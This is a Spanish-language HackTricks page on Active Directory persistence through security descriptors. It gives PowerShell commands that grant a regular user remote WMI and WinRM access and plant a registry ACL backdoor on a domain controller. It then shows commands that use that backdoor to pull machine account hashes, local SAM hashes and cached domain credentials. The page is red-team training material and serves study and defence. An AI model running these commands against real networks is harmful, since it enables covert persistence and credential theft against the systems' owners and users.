Security Descriptors

Aprende hacking en AWS desde cero hasta experto con htARTE (Experto en Red Team AWS de HackTricks)!

Otras formas de apoyar a HackTricks:

Descriptores de Seguridad

Desde la documentación: El Lenguaje de Definición de Descriptores de Seguridad (SDDL) define el formato que se utiliza para describir un descriptor de seguridad. SDDL utiliza cadenas ACE para DACL y SACL: tipo_ace;banderas_ace;derechos;object_guid;inherit_object_guid;account_sid;

Los descriptores de seguridad se utilizan para almacenar los permisos que un objeto tiene sobre otro objeto. Si puedes realizar un pequeño cambio en el descriptor de seguridad de un objeto, puedes obtener privilegios muy interesantes sobre ese objeto sin necesidad de ser miembro de un grupo privilegiado.

Entonces, esta técnica de persistencia se basa en la capacidad de obtener todos los privilegios necesarios sobre ciertos objetos, para poder realizar una tarea que normalmente requiere privilegios de administrador pero sin necesidad de ser administrador.

Acceso a WMI

Puedes dar a un usuario acceso para ejecutar de forma remota WMI usando esto:

Set-RemoteWMI -UserName student1 -ComputerName dcorp-dc –namespace 'root\cimv2' -Verbose
Set-RemoteWMI -UserName student1 -ComputerName dcorp-dc–namespace 'root\cimv2' -Remove -Verbose #Remove

Acceso a WinRM

Dar acceso a la consola de PS de WinRM a un usuario usando esto:

Set-RemotePSRemoting -UserName student1 -ComputerName <remotehost> -Verbose
Set-RemotePSRemoting -UserName student1 -ComputerName <remotehost> -Remove #Remove

Acceso remoto a hashes

Acceda al registro y extraiga los hashes creando una puerta trasera de Reg usando DAMP, para que en cualquier momento pueda recuperar el hash de la computadora, el SAM y cualquier credencial AD en caché en la computadora. Por lo tanto, es muy útil otorgar este permiso a un usuario regular contra una computadora del Controlador de Dominio:

# allows for the remote retrieval of a system's machine and local account hashes, as well as its domain cached credentials.
Add-RemoteRegBackdoor -ComputerName <remotehost> -Trustee student1 -Verbose

# Abuses the ACL backdoor set by Add-RemoteRegBackdoor to remotely retrieve the local machine account hash for the specified machine.
Get-RemoteMachineAccountHash -ComputerName <remotehost> -Verbose

# Abuses the ACL backdoor set by Add-RemoteRegBackdoor to remotely retrieve the local SAM account hashes for the specified machine.
Get-RemoteLocalAccountHash -ComputerName <remotehost> -Verbose

# Abuses the ACL backdoor set by Add-RemoteRegBackdoor to remotely retrieve the domain cached credentials for the specified machine.
Get-RemoteCachedCredential -ComputerName <remotehost> -Verbose

Revisa Tickets de Plata para aprender cómo podrías usar el hash de la cuenta de computadora de un Controlador de Dominio.

Última actualización